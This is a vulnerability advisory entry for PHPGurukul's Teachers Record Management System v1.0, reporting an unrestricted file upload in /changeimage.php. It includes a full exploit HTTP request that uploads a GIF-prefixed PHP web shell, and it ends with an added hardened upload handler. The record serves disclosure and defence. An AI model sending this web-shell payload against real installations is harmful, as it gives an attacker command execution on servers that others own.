Submit #166847: Teachers Record Management System v1.0 – File Upload Type Validation Error in /changeimage.php

Title: Teachers Record Management System v1.0 – File Upload Type Validation Error in /changeimage.php
Description:

# VULNERABILITY-TYPE : Unrestricted Upload of File with Dangerous Type
# VENDOR OF THE PRODUCT : PHPGURUKUL
# AFFECTED PRODUCT : Teachers Record Management System
# VERSION: v1.0
# ATTACK TYPE : REMOTE
# IMPACT: CODE EXECUTION
# AFFECTED COMPONENTS: SOURCE-CODE(changeimage.php)
# ATTACK VECTOR: changeimage(filename)
# DESCRIPTION: PHPGURUKUL Teachers Record Management System v1.0 suffers from File Upload Type Validation Error via /changeimage.php(filename)
# REFERENCES: 1.) https://cwe.mitre.org/data/definitions/434.html
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# BURPSUITE_POST_REQUEST

```
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--
```

# PROOF_OF_CONCEPT - GITHUB-LINK : https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
Source: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
User: Affan (UID 39417)
Submission: 06/09/2023 18:40 (3 years ago)
Moderation: 06/09/2023 22:35 (4 hours later)
Status: Accepted
VulDB entry: 231176 [PHPGurukul Teachers Record Management System 1.0 Profile Picture /changeimage.php newpic unrestricted upload]
Points: 20
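
A hardened server-side handler for the `newpic` upload in the request above, as an added example that is not PHPGurukul's code or part of the submission. The function name, upload directory and size limit are assumptions, and the code needs PHP's fileinfo and GD extensions.

```php
<?php
// Added example, not the application's code. Hypothetical names:
// store_profile_picture(), $uploadDir, the 2 MiB limit.
// Needs the fileinfo and gd extensions.
function store_profile_picture(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if (filesize($file['tmp_name']) > 2 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }

    // The request's Content-Type header and filename are client-controlled,
    // so neither is consulted. The type is sniffed from the bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ['image/gif', 'image/png', 'image/jpeg'], true)) {
        throw new RuntimeException('not an allowed image type');
    }

    // A magic-byte match alone is not enough: a file that merely begins with
    // "GIF89a" passes the sniff above. Decoding it as an image rejects data
    // that is not a real picture, and re-encoding discards trailing and
    // metadata bytes.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }
    imagesavealpha($img, true);

    // Server-chosen name with a single fixed extension; nothing from the
    // client filename (e.g. "x.php.gif") reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.png';
    if (!imagepng($img, rtrim($uploadDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store image');
    }
    return $name; // store this value in the profile row
}

// Usage in the form handler for the "newpic" field:
// $picture = store_profile_picture($_FILES['newpic'], '/var/app-data/profile');
// Keep $uploadDir outside the web root, or disable script handling for it.
```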
